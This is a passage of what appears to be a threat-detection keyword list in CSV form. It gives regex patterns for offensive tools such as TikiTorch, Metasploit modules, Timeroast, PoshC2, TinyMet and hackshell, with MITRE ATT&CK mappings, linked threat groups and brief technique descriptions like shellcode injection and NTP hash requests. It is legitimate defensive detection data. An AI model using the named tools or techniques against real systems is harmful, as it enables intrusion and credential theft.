Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61338"
"*TikiSpawn.dll*",".{0,1000}TikiSpawn\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61339"
"*TikiSpawn.exe*",".{0,1000}TikiSpawn\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61340"
"*TikiSpawn.ps1*",".{0,1000}TikiSpawn\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61341"
"*TikiSpawnAs*",".{0,1000}TikiSpawnAs.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61342"
"*TikiSpawnAsAdmin*",".{0,1000}TikiSpawnAsAdmin.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61343"
"*TikiSpawnElevated*",".{0,1000}TikiSpawnElevated.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61344"
"*TikiSpawnWOppid*",".{0,1000}TikiSpawnWOppid.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61345"
"*TikiSpawnWppid*",".{0,1000}TikiSpawnWppid.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61346"
"*TikiTorch.exe*",".{0,1000}TikiTorch\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61347"
"*TikiVader.*",".{0,1000}TikiVader\..{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61348"
"*timemachine_cmd_injection*",".{0,1000}timemachine_cmd_injection.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61349"
"*timeroast.ps1*",".{0,1000}timeroast\.ps1.{0,1000}","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","N/A","10","3","282","28","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z","61350"
"*timeroast.py*",".{0,1000}timeroast\.py.{0,1000}","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","N/A","10","3","282","28","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z","61351"
"*timestomp c:*",".{0,1000}timestomp\sc\:.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","61352"
"*timestomp.x64.o*",".{0,1000}timestomp\.x64\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","61353"
"*timing_attack * --brute-force*",".{0,1000}timing_attack\s.{0,1000}\s\-\-brute\-force.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","61354"
"*timwhitez/Doge-Loader*",".{0,1000}timwhitez\/Doge\-Loader.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","N/A","10","10","280","57","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z","61355"
"*TinyMet v0.2\ntinymet.com*",".{0,1000}TinyMet\sv0\.2\\ntinymet\.com.{0,1000}","offensive_tool_keyword","TinyMet","meterpreter stager","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","CL0P - FIN7 - FIN11 - Silence group - GOLD EVERGREEN","C2","https://github.com/SherifEldeeb/TinyMet","1","0","N/A","N/A","10","10","128","43","2019-08-20T04:39:22Z","2014-05-17T13:31:55Z","61357"
"*tinyurl.com/haxshl*",".{0,1000}tinyurl\.com\/haxshl.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","1","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","61358"
